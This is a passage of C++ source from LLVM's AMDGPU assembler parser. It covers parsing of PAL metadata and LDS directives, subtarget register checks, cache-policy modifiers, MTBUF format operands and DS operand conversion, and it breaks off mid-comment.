/// true if EOF is reached before AssemblerDirectiveEnd is found.
bool AMDGPUAsmParser::ParseToEndDirective(const char *AssemblerDirectiveBegin,
                                          const char *AssemblerDirectiveEnd,
                                          std::string &CollectString) {

  raw_string_ostream CollectStream(CollectString);

  // Disable whitespace skipping so the collected text keeps its layout
  // (significant for YAML); restored below before returning.
  getLexer().setSkipSpace(false);

  bool FoundEnd = false;
  while (!isToken(AsmToken::Eof)) {
    // Copy raw space tokens through verbatim.
    while (isToken(AsmToken::Space)) {
      CollectStream << getTokenStr();
      Lex();
    }

    if (trySkipId(AssemblerDirectiveEnd)) {
      FoundEnd = true;
      break;
    }

    CollectStream << Parser.parseStringToEndOfStatement()
                  << getContext().getAsmInfo()->getSeparatorString();

    Parser.eatToEndOfStatement();
  }

  getLexer().setSkipSpace(true);

  if (isToken(AsmToken::Eof) && !FoundEnd) {
    return TokError(Twine("expected directive ") +
                    Twine(AssemblerDirectiveEnd) + Twine(" not found"));
  }

  CollectStream.flush();
  return false;
}
/// Parse the assembler directive for new MsgPack-format PAL metadata:
/// collect the text up to the end directive and hand it to the PAL
/// metadata object. Returns true on error.
bool AMDGPUAsmParser::ParseDirectivePALMetadataBegin() {
  std::string Collected;
  if (ParseToEndDirective(AMDGPU::PALMD::AssemblerDirectiveBegin,
                          AMDGPU::PALMD::AssemblerDirectiveEnd, Collected))
    return true;

  auto Metadata = getTargetStreamer().getPALMetadata();
  if (!Metadata->setFromString(Collected))
    return Error(getLoc(), "invalid PAL metadata");
  return false;
}
/// Parse the assembler directive for old linear-format PAL metadata: a
/// comma-separated list of register/value pairs (so the value count must be
/// even). Only valid on amdpal OSes. Returns true on error.
bool AMDGPUAsmParser::ParseDirectivePALMetadata() {
  if (getSTI().getTargetTriple().getOS() != Triple::AMDPAL) {
    return Error(getLoc(),
                 (Twine(PALMD::AssemblerDirective) + Twine(" directive is "
                 "not available on non-amdpal OSes")).str());
  }

  auto PALMetadata = getTargetStreamer().getPALMetadata();
  PALMetadata->setLegacy();
  for (;;) {
    uint32_t Key, Value;
    if (ParseAsAbsoluteExpression(Key)) {
      return TokError(Twine("invalid value in ") +
                      Twine(PALMD::AssemblerDirective));
    }
    // A key with no following value is an odd-count list.
    if (!trySkipToken(AsmToken::Comma)) {
      return TokError(Twine("expected an even number of values in ") +
                      Twine(PALMD::AssemblerDirective));
    }
    if (ParseAsAbsoluteExpression(Value)) {
      return TokError(Twine("invalid value in ") +
                      Twine(PALMD::AssemblerDirective));
    }
    PALMetadata->setRegister(Key, Value);
    // No trailing comma means the list is complete.
    if (!trySkipToken(AsmToken::Comma))
      break;
  }
  return false;
}
/// ParseDirectiveAMDGPULDS
///  ::= .amdgpu_lds identifier ',' size_expression [',' align_expression]
///
/// Defines 'identifier' as an LDS symbol with the given size in bytes
/// (must be non-negative and fit in this subtarget's LDS) and alignment
/// (a power of two; defaults to 4). Returns true on error.
bool AMDGPUAsmParser::ParseDirectiveAMDGPULDS() {
  if (getParser().checkForValidSection())
    return true;

  StringRef Name;
  SMLoc NameLoc = getLoc();
  if (getParser().parseIdentifier(Name))
    return TokError("expected identifier in directive");

  MCSymbol *Symbol = getContext().getOrCreateSymbol(Name);
  if (parseToken(AsmToken::Comma, "expected ','"))
    return true;

  unsigned LocalMemorySize = AMDGPU::IsaInfo::getLocalMemorySize(&getSTI());

  int64_t Size;
  SMLoc SizeLoc = getLoc();
  if (getParser().parseAbsoluteExpression(Size))
    return true;
  if (Size < 0)
    return Error(SizeLoc, "size must be non-negative");
  if (Size > LocalMemorySize)
    return Error(SizeLoc, "size is too large");

  int64_t Alignment = 4;
  if (trySkipToken(AsmToken::Comma)) {
    SMLoc AlignLoc = getLoc();
    if (getParser().parseAbsoluteExpression(Alignment))
      return true;
    if (Alignment < 0 || !isPowerOf2_64(Alignment))
      return Error(AlignLoc, "alignment must be a power of two");

    // Alignment larger than the size of LDS is possible in theory, as long
    // as the linker manages to place the symbol at address 0, but we do want
    // to make sure the alignment fits nicely into a 32-bit integer.
    if (Alignment >= 1u << 31)
      return Error(AlignLoc, "alignment is too large");
  }

  if (parseToken(AsmToken::EndOfStatement,
                 "unexpected token in '.amdgpu_lds' directive"))
    return true;

  // Reject redefinition of an already-defined symbol.
  Symbol->redefineIfPossible();
  if (!Symbol->isUndefined())
    return Error(NameLoc, "invalid symbol redefinition");

  getTargetStreamer().emitAMDGPULDS(Symbol, Size, Align(Alignment));
  return false;
}
/// Dispatch AMDGPU-specific assembler directives by name. Returning true
/// means the directive was not consumed here (or a handler reported an
/// error) and propagates to the generic parser; false means success.
bool AMDGPUAsmParser::ParseDirective(AsmToken DirectiveID) {
  StringRef IDVal = DirectiveID.getString();

  // Code-object V3+ and earlier ABIs accept disjoint directive sets.
  if (isHsaAbiVersion3AndAbove(&getSTI())) {
    if (IDVal == ".amdhsa_kernel")
      return ParseDirectiveAMDHSAKernel();

    // TODO: Restructure/combine with PAL metadata directive.
    if (IDVal == AMDGPU::HSAMD::V3::AssemblerDirectiveBegin)
      return ParseDirectiveHSAMetadata();
  } else {
    if (IDVal == ".hsa_code_object_version")
      return ParseDirectiveHSACodeObjectVersion();

    if (IDVal == ".hsa_code_object_isa")
      return ParseDirectiveHSACodeObjectISA();

    if (IDVal == ".amd_kernel_code_t")
      return ParseDirectiveAMDKernelCodeT();

    if (IDVal == ".amdgpu_hsa_kernel")
      return ParseDirectiveAMDGPUHsaKernel();

    if (IDVal == ".amd_amdgpu_isa")
      return ParseDirectiveISAVersion();

    if (IDVal == AMDGPU::HSAMD::AssemblerDirectiveBegin)
      return ParseDirectiveHSAMetadata();
  }

  // Directives accepted regardless of ABI version.
  if (IDVal == ".amdgcn_target")
    return ParseDirectiveAMDGCNTarget();

  if (IDVal == ".amdgpu_lds")
    return ParseDirectiveAMDGPULDS();

  if (IDVal == PALMD::AssemblerDirectiveBegin)
    return ParseDirectivePALMetadataBegin();

  if (IDVal == PALMD::AssemblerDirective)
    return ParseDirectivePALMetadata();

  return true;
}
/// Return true if register RegNo (including any register aliasing it)
/// exists on the current subtarget. Used to reject registers that are only
/// present on some GPU generations (TTMP12-15, SGPR102-105, flat_scr,
/// xnack_mask, TBA/TMA, ...).
bool AMDGPUAsmParser::subtargetHasRegister(const MCRegisterInfo &MRI,
                                           unsigned RegNo) {
  // TTMP12..15 (and any alias overlapping them) exist only on GFX9+.
  for (MCRegAliasIterator R(AMDGPU::TTMP12_TTMP13_TTMP14_TTMP15, &MRI, true);
       R.isValid(); ++R) {
    if (*R == RegNo)
      return isGFX9Plus();
  }

  // GFX10 has 2 more SGPRs 104 and 105.
  for (MCRegAliasIterator R(AMDGPU::SGPR104_SGPR105, &MRI, true);
       R.isValid(); ++R) {
    if (*R == RegNo)
      return hasSGPR104_SGPR105();
  }

  switch (RegNo) {
  case AMDGPU::SRC_SHARED_BASE:
  case AMDGPU::SRC_SHARED_LIMIT:
  case AMDGPU::SRC_PRIVATE_BASE:
  case AMDGPU::SRC_PRIVATE_LIMIT:
  case AMDGPU::SRC_POPS_EXITING_WAVE_ID:
    return isGFX9Plus();
  case AMDGPU::TBA:
  case AMDGPU::TBA_LO:
  case AMDGPU::TBA_HI:
  case AMDGPU::TMA:
  case AMDGPU::TMA_LO:
  case AMDGPU::TMA_HI:
    // TBA/TMA are only accepted on pre-GFX9 subtargets.
    return !isGFX9Plus();
  case AMDGPU::XNACK_MASK:
  case AMDGPU::XNACK_MASK_LO:
  case AMDGPU::XNACK_MASK_HI:
    // xnack_mask also requires XNACK support in the target id.
    return (isVI() || isGFX9()) &&
           getTargetStreamer().getTargetID()->isXnackSupported();
  case AMDGPU::SGPR_NULL:
    return isGFX10Plus();
  default:
    break;
  }

  if (isCI())
    return true;

  if (isSI() || isGFX10Plus()) {
    // No flat_scr on SI.
    // On GFX10 flat scratch is not a valid register operand and can only be
    // accessed with s_setreg/s_getreg.
    switch (RegNo) {
    case AMDGPU::FLAT_SCR:
    case AMDGPU::FLAT_SCR_LO:
    case AMDGPU::FLAT_SCR_HI:
      return false;
    default:
      return true;
    }
  }

  // VI only has 102 SGPRs, so make sure we aren't trying to use the 2 more that
  // SI/CI have.
  for (MCRegAliasIterator R(AMDGPU::SGPR102_SGPR103, &MRI, true);
       R.isValid(); ++R) {
    if (*R == RegNo)
      return hasSGPR102_SGPR103();
  }

  return true;
}
/// Parse a single instruction operand. Gives the tblgen'd custom parsers
/// the first chance; otherwise parses a plain register/immediate, or -- in
/// OperandMode_NSA -- a bracketed register list "[r0, r1, ...]".
OperandMatchResultTy
AMDGPUAsmParser::parseOperand(OperandVector &Operands, StringRef Mnemonic,
                              OperandMode Mode) {
  // Try to parse with a custom parser
  OperandMatchResultTy ResTy = MatchOperandParserImpl(Operands, Mnemonic);

  // If we successfully parsed the operand or if there was an error parsing,
  // we are done.
  //
  // If we are parsing after we reach EndOfStatement then this means we
  // are appending default values to the Operands list. This is only done
  // by custom parser, so we shouldn't continue on to the generic parsing.
  if (ResTy == MatchOperand_Success || ResTy == MatchOperand_ParseFail ||
      isToken(AsmToken::EndOfStatement))
    return ResTy;

  SMLoc RBraceLoc;
  SMLoc LBraceLoc = getLoc();
  if (Mode == OperandMode_NSA && trySkipToken(AsmToken::LBrac)) {
    unsigned Prefix = Operands.size();

    for (;;) {
      auto Loc = getLoc();
      ResTy = parseReg(Operands);
      if (ResTy == MatchOperand_NoMatch)
        Error(Loc, "expected a register");
      if (ResTy != MatchOperand_Success)
        return MatchOperand_ParseFail;

      RBraceLoc = getLoc();
      if (trySkipToken(AsmToken::RBrac))
        break;

      if (!skipToken(AsmToken::Comma,
                     "expected a comma or a closing square bracket")) {
        return MatchOperand_ParseFail;
      }
    }

    // Only a multi-register list keeps explicit bracket tokens; a
    // single-register list degenerates to the register alone.
    if (Operands.size() - Prefix > 1) {
      Operands.insert(Operands.begin() + Prefix,
                      AMDGPUOperand::CreateToken(this, "[", LBraceLoc));
      Operands.push_back(AMDGPUOperand::CreateToken(this, "]", RBraceLoc));
    }

    return MatchOperand_Success;
  }

  return parseRegOrImm(Operands);
}
/// Strip a forced-encoding suffix (_e64/_e32/_dpp/_sdwa) from a mnemonic,
/// recording the forced encoding for the current instruction, and return
/// the bare mnemonic.
StringRef AMDGPUAsmParser::parseMnemonicSuffix(StringRef Name) {
  // Clear any forced encodings from the previous instruction.
  setForcedEncodingSize(0);
  setForcedDPP(false);
  setForcedSDWA(false);

  StringRef Mnemo = Name;
  if (Mnemo.consume_back("_e64"))
    setForcedEncodingSize(64);
  else if (Mnemo.consume_back("_e32"))
    setForcedEncodingSize(32);
  else if (Mnemo.consume_back("_dpp"))
    setForcedDPP(true);
  else if (Mnemo.consume_back("_sdwa"))
    setForcedSDWA(true);
  return Mnemo;
}
/// Parse a full instruction: a mnemonic (with optional _e32/_e64/_dpp/_sdwa
/// suffix) followed by a comma-separated operand list. On failure a
/// diagnostic is emitted and the rest of the statement is consumed.
bool AMDGPUAsmParser::ParseInstruction(ParseInstructionInfo &Info,
                                       StringRef Name,
                                       SMLoc NameLoc, OperandVector &Operands) {
  // Add the instruction mnemonic
  Name = parseMnemonicSuffix(Name);
  Operands.push_back(AMDGPUOperand::CreateToken(this, Name, NameLoc));

  bool IsMIMG = Name.startswith("image_");

  while (!trySkipToken(AsmToken::EndOfStatement)) {
    OperandMode Mode = OperandMode_Default;
    // On GFX10+, the MIMG address operand (the second parsed operand) may
    // be an NSA register list.
    if (IsMIMG && isGFX10Plus() && Operands.size() == 2)
      Mode = OperandMode_NSA;
    // Reset per-instruction cache-policy modifier tracking.
    CPolSeen = 0;
    OperandMatchResultTy Res = parseOperand(Operands, Name, Mode);

    if (Res != MatchOperand_Success) {
      checkUnsupportedInstruction(Name, NameLoc);
      if (!Parser.hasPendingError()) {
        // FIXME: use real operand location rather than the current location.
        StringRef Msg =
          (Res == MatchOperand_ParseFail) ? "failed parsing operand." :
                                            "not a valid operand.";
        Error(getLoc(), Msg);
      }
      // Discard the remainder of the malformed statement.
      while (!trySkipToken(AsmToken::EndOfStatement)) {
        lex();
      }
      return true;
    }

    // Eat the comma or space if there is one.
    trySkipToken(AsmToken::Comma);
  }

  return false;
}
//===----------------------------------------------------------------------===//
// Utility functions
//===----------------------------------------------------------------------===//
/// Parse "<Prefix>:<expr>" and store the expression's value in IntVal.
/// Returns NoMatch when the prefix (followed by a colon) is absent.
OperandMatchResultTy
AMDGPUAsmParser::parseIntWithPrefix(const char *Prefix, int64_t &IntVal) {
  if (!trySkipId(Prefix, AsmToken::Colon))
    return MatchOperand_NoMatch;

  if (!parseExpr(IntVal))
    return MatchOperand_ParseFail;
  return MatchOperand_Success;
}
/// Parse "<Prefix>:<value>" into an immediate operand of type ImmTy.
/// If ConvertResult is provided it may rewrite the value in place; when the
/// conversion fails, an error is recorded but the operand is still created
/// so that parsing can continue.
OperandMatchResultTy
AMDGPUAsmParser::parseIntWithPrefix(const char *Prefix, OperandVector &Operands,
                                    AMDGPUOperand::ImmTy ImmTy,
                                    bool (*ConvertResult)(int64_t&)) {
  SMLoc S = getLoc();
  int64_t Value = 0;

  OperandMatchResultTy Res = parseIntWithPrefix(Prefix, Value);
  if (Res != MatchOperand_Success)
    return Res;

  if (ConvertResult && !ConvertResult(Value)) {
    Error(S, "invalid " + StringRef(Prefix) + " value.");
  }

  Operands.push_back(AMDGPUOperand::CreateImm(this, Value, S, ImmTy));
  return MatchOperand_Success;
}
/// Parse "<Prefix>:[b0,b1,...]" -- a list of up to 4 bits (each 0 or 1)
/// packed LSB-first into a single immediate operand of type ImmTy.
/// NOTE(review): the ConvertResult parameter is accepted but never used in
/// this overload.
OperandMatchResultTy
AMDGPUAsmParser::parseOperandArrayWithPrefix(const char *Prefix,
                                             OperandVector &Operands,
                                             AMDGPUOperand::ImmTy ImmTy,
                                             bool (*ConvertResult)(int64_t&)) {
  SMLoc S = getLoc();
  if (!trySkipId(Prefix, AsmToken::Colon))
    return MatchOperand_NoMatch;

  if (!skipToken(AsmToken::LBrac, "expected a left square bracket"))
    return MatchOperand_ParseFail;

  unsigned Val = 0;
  const unsigned MaxSize = 4;

  // FIXME: How to verify the number of elements matches the number of src
  // operands?
  for (int I = 0; ; ++I) {
    int64_t Op;
    SMLoc Loc = getLoc();
    if (!parseExpr(Op))
      return MatchOperand_ParseFail;

    if (Op != 0 && Op != 1) {
      Error(Loc, "invalid " + StringRef(Prefix) + " value.");
      return MatchOperand_ParseFail;
    }

    // Pack bit I of the result.
    Val |= (Op << I);

    if (trySkipToken(AsmToken::RBrac))
      break;

    if (I + 1 == MaxSize) {
      Error(getLoc(), "expected a closing square bracket");
      return MatchOperand_ParseFail;
    }

    if (!skipToken(AsmToken::Comma, "expected a comma"))
      return MatchOperand_ParseFail;
  }

  Operands.push_back(AMDGPUOperand::CreateImm(this, Val, S, ImmTy));
  return MatchOperand_Success;
}
/// Parse a named bit modifier: the bare name ("glc", "r128", ...) sets the
/// bit to 1, the "no"-prefixed form sets it to 0. Validates subtarget
/// support for r128/a16; on GFX9 the a16 immediate type is remapped to the
/// combined ImmTyR128A16 slot.
OperandMatchResultTy
AMDGPUAsmParser::parseNamedBit(StringRef Name, OperandVector &Operands,
                               AMDGPUOperand::ImmTy ImmTy) {
  int64_t Bit;
  SMLoc S = getLoc();

  if (trySkipId(Name)) {
    Bit = 1;
  } else if (trySkipId("no", Name)) {
    Bit = 0;
  } else {
    return MatchOperand_NoMatch;
  }

  if (Name == "r128" && !hasMIMG_R128()) {
    Error(S, "r128 modifier is not supported on this GPU");
    return MatchOperand_ParseFail;
  }
  if (Name == "a16" && !isGFX9() && !hasGFX10A16()) {
    Error(S, "a16 modifier is not supported on this GPU");
    return MatchOperand_ParseFail;
  }

  if (isGFX9() && ImmTy == AMDGPUOperand::ImmTyA16)
    ImmTy = AMDGPUOperand::ImmTyR128A16;

  Operands.push_back(AMDGPUOperand::CreateImm(this, Bit, S, ImmTy));
  return MatchOperand_Success;
}
/// Parse one cache-policy modifier (glc/slc/dlc/scc, or its "no"-prefixed
/// negation). Modifiers accumulate into a single ImmTyCPol operand;
/// duplicates (tracked in CPolSeen) and modifiers the subtarget does not
/// support are rejected.
OperandMatchResultTy
AMDGPUAsmParser::parseCPol(OperandVector &Operands) {
  unsigned CPolOn = 0;   // bits to set
  unsigned CPolOff = 0;  // bits to clear ("no..." forms)
  SMLoc S = getLoc();

  if (trySkipId("glc"))
    CPolOn = AMDGPU::CPol::GLC;
  else if (trySkipId("noglc"))
    CPolOff = AMDGPU::CPol::GLC;
  else if (trySkipId("slc"))
    CPolOn = AMDGPU::CPol::SLC;
  else if (trySkipId("noslc"))
    CPolOff = AMDGPU::CPol::SLC;
  else if (trySkipId("dlc"))
    CPolOn = AMDGPU::CPol::DLC;
  else if (trySkipId("nodlc"))
    CPolOff = AMDGPU::CPol::DLC;
  else if (trySkipId("scc"))
    CPolOn = AMDGPU::CPol::SCC;
  else if (trySkipId("noscc"))
    CPolOff = AMDGPU::CPol::SCC;
  else
    return MatchOperand_NoMatch;

  if (!isGFX10Plus() && ((CPolOn | CPolOff) & AMDGPU::CPol::DLC)) {
    Error(S, "dlc modifier is not supported on this GPU");
    return MatchOperand_ParseFail;
  }

  if (!isGFX90A() && ((CPolOn | CPolOff) & AMDGPU::CPol::SCC)) {
    Error(S, "scc modifier is not supported on this GPU");
    return MatchOperand_ParseFail;
  }

  // "glc noglc" (or a plain repeat) is a duplicate of the same policy bit.
  if (CPolSeen & (CPolOn | CPolOff)) {
    Error(S, "duplicate cache policy modifier");
    return MatchOperand_ParseFail;
  }

  CPolSeen |= (CPolOn | CPolOff);

  // Merge into an existing CPol operand (from an earlier modifier on the
  // same instruction) instead of adding a second one.
  for (unsigned I = 1; I != Operands.size(); ++I) {
    AMDGPUOperand &Op = ((AMDGPUOperand &)*Operands[I]);
    if (Op.isCPol()) {
      Op.setImm((Op.getImm() | CPolOn) & ~CPolOff);
      return MatchOperand_Success;
    }
  }

  Operands.push_back(AMDGPUOperand::CreateImm(this, CPolOn, S,
                                              AMDGPUOperand::ImmTyCPol));

  return MatchOperand_Success;
}
/// If an operand of type ImmT was recorded in OptionalIdx, append its
/// immediate to Inst; otherwise append Default.
static void addOptionalImmOperand(
  MCInst& Inst, const OperandVector& Operands,
  AMDGPUAsmParser::OptionalImmIndexMap& OptionalIdx,
  AMDGPUOperand::ImmTy ImmT,
  int64_t Default = 0) {
  auto It = OptionalIdx.find(ImmT);
  if (It == OptionalIdx.end()) {
    Inst.addOperand(MCOperand::createImm(Default));
    return;
  }
  ((AMDGPUOperand &)*Operands[It->second]).addImmOperands(Inst, 1);
}
/// Parse "<Prefix>:<identifier>", returning the identifier in Value and
/// its source location in StringLoc.
OperandMatchResultTy
AMDGPUAsmParser::parseStringWithPrefix(StringRef Prefix,
                                       StringRef &Value,
                                       SMLoc &StringLoc) {
  if (!trySkipId(Prefix, AsmToken::Colon))
    return MatchOperand_NoMatch;

  StringLoc = getLoc();
  if (parseId(Value, "expected an identifier"))
    return MatchOperand_Success;
  return MatchOperand_ParseFail;
}
//===----------------------------------------------------------------------===//
// MTBUF format
//===----------------------------------------------------------------------===//
/// Try to parse "<Pref>:<value>" with value in [0..MaxVal], storing the
/// value in Fmt. Note the inverted return convention relative to the
/// parse* helpers: returns false only on a hard parse or range error (a
/// diagnostic has already been emitted); returns true both on success and
/// when the prefix is simply absent (Fmt is left unchanged).
bool AMDGPUAsmParser::tryParseFmt(const char *Pref,
                                  int64_t MaxVal,
                                  int64_t &Fmt) {
  int64_t Val;
  SMLoc Loc = getLoc();

  auto Res = parseIntWithPrefix(Pref, Val);
  if (Res == MatchOperand_ParseFail)
    return false;
  if (Res == MatchOperand_NoMatch)
    return true;

  if (Val < 0 || Val > MaxVal) {
    Error(Loc, Twine("out of range ", StringRef(Pref)));
    return false;
  }

  Fmt = Val;
  return true;
}
// dfmt and nfmt (in a tbuffer instruction) are parsed as one to allow their
// values to live in a joint format operand in the MCInst encoding.
// Returns NoMatch when neither modifier is present; an omitted half falls
// back to its default encoding.
OperandMatchResultTy
AMDGPUAsmParser::parseDfmtNfmt(int64_t &Format) {
  using namespace llvm::AMDGPU::MTBUFFormat;

  int64_t Dfmt = DFMT_UNDEF;
  int64_t Nfmt = NFMT_UNDEF;

  // dfmt and nfmt can appear in either order, and each is optional.
  for (int I = 0; I < 2; ++I) {
    if (Dfmt == DFMT_UNDEF && !tryParseFmt("dfmt", DFMT_MAX, Dfmt))
      return MatchOperand_ParseFail;

    if (Nfmt == NFMT_UNDEF && !tryParseFmt("nfmt", NFMT_MAX, Nfmt)) {
      return MatchOperand_ParseFail;
    }
    // Skip optional comma between dfmt/nfmt
    // but guard against 2 commas following each other.
    if ((Dfmt == DFMT_UNDEF) != (Nfmt == NFMT_UNDEF) &&
        !peekToken().is(AsmToken::Comma)) {
      trySkipToken(AsmToken::Comma);
    }
  }

  if (Dfmt == DFMT_UNDEF && Nfmt == NFMT_UNDEF)
    return MatchOperand_NoMatch;

  // Substitute defaults for whichever half was omitted.
  Dfmt = (Dfmt == DFMT_UNDEF) ? DFMT_DEFAULT : Dfmt;
  Nfmt = (Nfmt == NFMT_UNDEF) ? NFMT_DEFAULT : Nfmt;

  Format = encodeDfmtNfmt(Dfmt, Nfmt);
  return MatchOperand_Success;
}
/// Parse the GFX10+ unified "format:<n>" modifier into Format.
OperandMatchResultTy
AMDGPUAsmParser::parseUfmt(int64_t &Format) {
  using namespace llvm::AMDGPU::MTBUFFormat;

  int64_t Val = UFMT_UNDEF;
  if (!tryParseFmt("format", UFMT_MAX, Val))
    return MatchOperand_ParseFail;
  if (Val == UFMT_UNDEF)
    return MatchOperand_NoMatch;

  Format = Val;
  return MatchOperand_Success;
}
/// Interpret FormatStr as either a data-format or a numeric-format name and
/// record it in Dfmt or Nfmt accordingly. Emits "unsupported format" and
/// returns false when the string matches neither kind.
bool AMDGPUAsmParser::matchDfmtNfmt(int64_t &Dfmt,
                                    int64_t &Nfmt,
                                    StringRef FormatStr,
                                    SMLoc Loc) {
  using namespace llvm::AMDGPU::MTBUFFormat;

  int64_t Val = getDfmt(FormatStr);
  if (Val != DFMT_UNDEF) {
    Dfmt = Val;
    return true;
  }

  Val = getNfmt(FormatStr, getSTI());
  if (Val != NFMT_UNDEF) {
    Nfmt = Val;
    return true;
  }

  Error(Loc, "unsupported format");
  return false;
}
/// Parse the split symbolic format: one or two comma-separated format names
/// (at most one data format and one numeric format). On GFX10+ the pair is
/// re-encoded as a unified format; otherwise as a dfmt/nfmt pair.
OperandMatchResultTy
AMDGPUAsmParser::parseSymbolicSplitFormat(StringRef FormatStr,
                                          SMLoc FormatLoc,
                                          int64_t &Format) {
  using namespace llvm::AMDGPU::MTBUFFormat;

  int64_t Dfmt = DFMT_UNDEF;
  int64_t Nfmt = NFMT_UNDEF;
  if (!matchDfmtNfmt(Dfmt, Nfmt, FormatStr, FormatLoc))
    return MatchOperand_ParseFail;

  if (trySkipToken(AsmToken::Comma)) {
    StringRef Str;
    SMLoc Loc = getLoc();
    if (!parseId(Str, "expected a format string") ||
        !matchDfmtNfmt(Dfmt, Nfmt, Str, Loc)) {
      return MatchOperand_ParseFail;
    }
    // With two names parsed, one of each kind must have been seen: an unset
    // Dfmt here means both names were numeric formats, and vice versa.
    if (Dfmt == DFMT_UNDEF) {
      Error(Loc, "duplicate numeric format");
      return MatchOperand_ParseFail;
    } else if (Nfmt == NFMT_UNDEF) {
      Error(Loc, "duplicate data format");
      return MatchOperand_ParseFail;
    }
  }

  // Substitute defaults for whichever half was omitted.
  Dfmt = (Dfmt == DFMT_UNDEF) ? DFMT_DEFAULT : Dfmt;
  Nfmt = (Nfmt == NFMT_UNDEF) ? NFMT_DEFAULT : Nfmt;

  if (isGFX10Plus()) {
    auto Ufmt = convertDfmtNfmt2Ufmt(Dfmt, Nfmt);
    if (Ufmt == UFMT_UNDEF) {
      Error(FormatLoc, "unsupported format");
      return MatchOperand_ParseFail;
    }
    Format = Ufmt;
  } else {
    Format = encodeDfmtNfmt(Dfmt, Nfmt);
  }

  return MatchOperand_Success;
}
/// Try to interpret FormatStr as a GFX10+ unified format name. Returns
/// NoMatch when the name is unknown; unified names on pre-GFX10 targets are
/// a hard error.
OperandMatchResultTy
AMDGPUAsmParser::parseSymbolicUnifiedFormat(StringRef FormatStr,
                                            SMLoc Loc,
                                            int64_t &Format) {
  using namespace llvm::AMDGPU::MTBUFFormat;

  auto Id = getUnifiedFormat(FormatStr);
  if (Id == UFMT_UNDEF)
    return MatchOperand_NoMatch;

  if (isGFX10Plus()) {
    Format = Id;
    return MatchOperand_Success;
  }

  Error(Loc, "unified format is not supported on this GPU");
  return MatchOperand_ParseFail;
}
/// Parse a numeric format expression and range-check it against the
/// encodings valid for this subtarget.
OperandMatchResultTy
AMDGPUAsmParser::parseNumericFormat(int64_t &Format) {
  using namespace llvm::AMDGPU::MTBUFFormat;

  SMLoc ValueLoc = getLoc();
  if (!parseExpr(Format))
    return MatchOperand_ParseFail;

  if (isValidFormatEncoding(Format, getSTI()))
    return MatchOperand_Success;

  Error(ValueLoc, "out of range format");
  return MatchOperand_ParseFail;
}
/// Parse "format:" followed by either a symbolic name list in square
/// brackets or a numeric format expression.
OperandMatchResultTy
AMDGPUAsmParser::parseSymbolicOrNumericFormat(int64_t &Format) {
  using namespace llvm::AMDGPU::MTBUFFormat;

  if (!trySkipId("format", AsmToken::Colon))
    return MatchOperand_NoMatch;

  if (trySkipToken(AsmToken::LBrac)) {
    StringRef FormatStr;
    SMLoc Loc = getLoc();
    if (!parseId(FormatStr, "expected a format string"))
      return MatchOperand_ParseFail;

    // Try the GFX10+ unified name first, then the split dfmt/nfmt names.
    auto Res = parseSymbolicUnifiedFormat(FormatStr, Loc, Format);
    if (Res == MatchOperand_NoMatch)
      Res = parseSymbolicSplitFormat(FormatStr, Loc, Format);
    if (Res != MatchOperand_Success)
      return Res;

    if (!skipToken(AsmToken::RBrac, "expected a closing square bracket"))
      return MatchOperand_ParseFail;

    return MatchOperand_Success;
  }

  return parseNumericFormat(Format);
}
/// Parse the MTBUF format operand together with the soffset operand that
/// follows it. The format may appear before soffset (legacy dfmt/nfmt or
/// GFX10+ "format:N") or after it; in the latter case the already-pushed
/// default format immediate is patched in place.
OperandMatchResultTy
AMDGPUAsmParser::parseFORMAT(OperandVector &Operands) {
  using namespace llvm::AMDGPU::MTBUFFormat;

  int64_t Format = getDefaultFormatEncoding(getSTI());
  OperandMatchResultTy Res;
  SMLoc Loc = getLoc();

  // Parse legacy format syntax.
  Res = isGFX10Plus() ? parseUfmt(Format) : parseDfmtNfmt(Format);
  if (Res == MatchOperand_ParseFail)
    return Res;

  bool FormatFound = (Res == MatchOperand_Success);

  // Always push a format operand; it holds the default encoding when no
  // format was written before soffset.
  Operands.push_back(
    AMDGPUOperand::CreateImm(this, Format, Loc, AMDGPUOperand::ImmTyFORMAT));

  if (FormatFound)
    trySkipToken(AsmToken::Comma);

  if (isToken(AsmToken::EndOfStatement)) {
    // We are expecting an soffset operand,
    // but let matcher handle the error.
    return MatchOperand_Success;
  }

  // Parse soffset.
  Res = parseRegOrImm(Operands);
  if (Res != MatchOperand_Success)
    return Res;

  trySkipToken(AsmToken::Comma);

  if (!FormatFound) {
    Res = parseSymbolicOrNumericFormat(Format);
    if (Res == MatchOperand_ParseFail)
      return Res;
    if (Res == MatchOperand_Success) {
      // Patch the placeholder pushed above; it sits immediately before the
      // soffset operand just parsed.
      auto Size = Operands.size();
      AMDGPUOperand &Op = static_cast<AMDGPUOperand &>(*Operands[Size - 2]);
      assert(Op.isImm() && Op.getImmTy() == AMDGPUOperand::ImmTyFORMAT);
      Op.setImm(Format);
    }
    return MatchOperand_Success;
  }

  // A second format after soffset when one already appeared before it.
  if (isId("format") && peekToken().is(AsmToken::Colon)) {
    Error(getLoc(), "duplicate format");
    return MatchOperand_ParseFail;
  }
  return MatchOperand_Success;
}
//===----------------------------------------------------------------------===//
// ds
//===----------------------------------------------------------------------===//
// Convert parsed DS operands (offset0/offset1 flavor) to MCInst operands.
void AMDGPUAsmParser::cvtDSOffset01(MCInst &Inst,
                                    const OperandVector &Operands) {
  OptionalImmIndexMap OptionalIdx;

  // Registers are appended in parse order; immediate modifiers are
  // remembered by type and appended afterwards in canonical order.
  for (unsigned I = 1, E = Operands.size(); I != E; ++I) {
    AMDGPUOperand &Opnd = ((AMDGPUOperand &)*Operands[I]);
    if (Opnd.isReg())
      Opnd.addRegOperands(Inst, 1);
    else
      OptionalIdx[Opnd.getImmTy()] = I;
  }

  addOptionalImmOperand(Inst, Operands, OptionalIdx, AMDGPUOperand::ImmTyOffset0);
  addOptionalImmOperand(Inst, Operands, OptionalIdx, AMDGPUOperand::ImmTyOffset1);
  addOptionalImmOperand(Inst, Operands, OptionalIdx, AMDGPUOperand::ImmTyGDS);

  Inst.addOperand(MCOperand::createReg(AMDGPU::M0)); // m0
}
// Convert parsed DS operands to MCInst operands. IsGdsHardcoded is true when
// the opcode's asm string itself contains "gds" (so it must not also be
// emitted as an optional modifier).
void AMDGPUAsmParser::cvtDSImpl(MCInst &Inst, const OperandVector &Operands,
                                bool IsGdsHardcoded) {
  OptionalImmIndexMap OptionalIdx;

  for (unsigned i = 1, e = Operands.size(); i != e; ++i) {
    AMDGPUOperand &Op = ((AMDGPUOperand &)*Operands[i]);

    // Add the register arguments
    if (Op.isReg()) {
      Op.addRegOperands(Inst, 1);
      continue;
    }

    // A literal "gds" token means gds is mandatory for this instruction.
    if (Op.isToken() && Op.getToken() == "gds") {
      IsGdsHardcoded = true;
      continue;
    }

    // Handle optional arguments
    OptionalIdx[Op.getImmTy()] = i;
  }

  // ds_swizzle_b32 uses the swizzle flavor of the offset operand; all
